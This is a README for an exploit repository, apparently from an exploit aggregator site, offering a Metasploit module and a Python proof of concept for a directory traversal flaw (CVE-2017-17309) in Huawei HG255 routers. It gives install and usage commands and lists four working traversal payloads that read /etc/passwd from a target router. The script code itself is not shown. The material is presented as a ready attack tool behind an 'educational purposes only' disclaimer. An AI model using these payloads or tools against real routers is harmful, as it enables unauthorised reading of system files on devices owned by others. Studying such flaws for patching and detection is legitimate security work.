## https://sploitus.com/exploit?id=B2DF9300-C4EC-59E8-AD18-E1C6B23D3A56
# Huawei HG255 Directory Traversal Exploit (CVE-2017-17309)
This repository contains tools to exploit the directory traversal vulnerability in Huawei HG255 routers. This vulnerability allows an attacker to read arbitrary files from the server via malicious GET requests.
## Vulnerability Details
- **CVE:** CVE-2017-17309
- **Vulnerability Type:** Directory Traversal
- **Affected Device:** Huawei HG255
- **Reference:** [Huawei Security Notice](https://www.huawei.com/en/psirt/security-notices/huawei-sn-20170911-01-hg255s-en)
## Tools
### 1. Metasploit Module
A Metasploit auxiliary module to check for the vulnerability.
#### Installation
Copy the `huawei_hg255_traversal.rb` file to your Metasploit auxiliary directory:
```bash
cp huawei_hg255_traversal.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/http/huawei_hg255_traversal.rb
```
#### Usage
```bash
msfconsole
use auxiliary/scanner/http/huawei_hg255_traversal
set RHOSTS
run
```
### 2. Python Proof of Concept (PoC)
A standalone Python script to demonstrate the exploit.
#### Requirements
- Python 3.x
- `requests` library
#### Usage
```bash
python3 exploit.py -t -p
```
**Example:**
```bash
python3 exploit.py -t 192.168.1.1
```
## Payloads
The tools test the following paths:
- `/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd`
- `/lib/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd`
- `/res/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd`
- `/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd`
## Author
- **Ismail Tasdelen**
## Disclaimer
This tool is for educational purposes only. Use it at your own risk. The author is not responsible for any damage caused by the use of this tool.